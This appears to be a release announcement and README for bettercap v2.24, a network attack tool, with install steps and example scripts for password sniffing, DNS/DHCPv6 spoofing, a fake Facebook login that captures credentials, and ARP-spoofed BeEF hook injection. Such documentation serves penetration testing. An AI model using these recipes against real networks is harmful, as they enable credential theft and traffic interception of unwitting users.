bettercap v2.24 releases: Swiss army knife for network attacks and monitoring

bettercap is the Swiss army knife for network attacks and monitoring.

Bettercap v2.24 released.


New Features

  • net.probe is now able to actively discover mDNS services
  • implemented mDNS server / spoofer as mdns.server (closes #542)
  • added dns CHAOS banner grabber to syn.scan
  • improved syn.scan module performances when scanning multiple addresses
  • syn.scan will now perform basic tcp banner grabbing


  • fixed a nil pointer dereference when is called but the wifi module is not running (fixes #562)
  • updated dependencies (fixes #561)
  • logs when the http2 stream is closed are now debug logs
  • fixed release script to update stable docker image (fixes #553)
  • fix an alignment issue for atomic ops on arm
  • syn.scan now uses a dedicated pcap handle to prevent deadlocks and improve performances
  • and https.server certificates are now correctly generated with IsCA to false
  • made BLE module less verbose by switching some of the logs to debug ones
  • fixed compilation issue related to mdlayher/raw dependency (ref #468)
  • fixing CORS headers only if sslstrip is enabled (fixes #543)
  • updated gatt library to fix an invalid memory access bug


  • Add docker image latest
  • Minor improvements to prevent unecessaries allocations
  • Fixing ignored error in trigger list
  • set gps module default baud rate to 4800bps



In this repository, BetterCAP is containerized using Alpine Linux – a security-oriented, lightweight Linux distribution based on musl libc and busybox. The resulting Docker image is relatively small and easy to manage the dependencies.

To pull latest BetterCAP version of the image:

$ docker pull evilsocket/bettercap-ng

To run:

$ docker run -it --privileged --net=host evilsocket/bettercap-ng -h


Make sure you have a correctly configured Go >= 1.8 environments, that $GOPATH/bin is in $PATH and the libpcap-dev package installed on your system, then:

$ go get

To show the command line options:

$ sudo bettercap-ng -h

Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
        Print debug messages.
  -eval string
        Run a command, used to set variables via command line.
  -iface string
        Network interface to bind to.
        Disable history file.
        Suppress all logs which are not errors.






















Interactive sessions can be scripted with .cap files, or caplets, the following are a few basic examples, look the caplets folder for more.


Simple password sniffer.

# keep reading arp table for network mapping
net.recon on
# setup a regular expression for packet payloads
set net.sniff.regexp .*password=.+
# set the sniffer output file
set net.sniff.output passwords.pcap
# start the sniffer
net.sniff on























Reroute DNS requests by using DHCPv6 replies, start an HTTP server and DNS spoofer for and

# let's spoof Microsoft and Google ^_^

# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www

# check who's alive on the network
net.recon on
# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen






















Start a rest API.

# change these!
set bcap
set bcap
# set 8082

# actively probe network for new hosts
net.probe on
net.recon on

# enjoy /api/session and /api/events on























Get information about the current session:

curl -k –user bpcap:bcap https://bettercap-ip:8083/api/session

Execute a command in the current interactive session:

curl -k –user bcap:bcap https://bettercap-ip:8083/api/session -H “Content-Type: application/json” -X POST -d ‘{“cmd”:”net.probe on”}’

Get last 50 events:

curl -k –user bpcap:bcap https://bettercap-ip:8083/api/events?n=50

Clear events:

curl -k –user bpcap:bcap -X DELETE https://bettercap-ip:8083/api/events


This caplet will create a fake Facebook login page on port 80, intercept login attempts using the http.proxy, print credentials and redirect the target to the real Facebook.

Make sure to create the folder first:

$ cd caplets/www/
$ make
set http.server.address
set http.server.path caplets/www/

set http.proxy.script caplets/fb-phish.js

http.proxy on
http.server on























The caplets/fb-phish.js proxy script file:


Use a proxy script to inject a BEEF javascript hook:

# targeting the whole subnet by default, to make it selective:
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on























The caplets/beef.inject.js proxy script file:

Interactive Mode

Interactive mode allows you to start and stop modules manually on the fly, change options and apply new firewall rules on the fly, to show the help menu type help, you can have module specific help by using help module-name.


Copyright (C) 2018 Simone Margaritelli